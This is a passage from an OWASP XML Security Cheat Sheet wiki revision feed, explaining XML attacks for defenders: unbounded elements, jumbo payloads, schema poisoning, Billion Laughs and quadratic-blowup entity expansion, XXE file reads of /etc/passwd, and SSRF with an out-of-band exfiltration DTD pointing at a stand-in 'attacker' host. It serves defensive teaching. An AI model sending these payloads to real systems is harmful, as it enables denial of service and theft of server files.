   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224431</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224431"/>
				<updated>2016-12-21T20:19:24Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
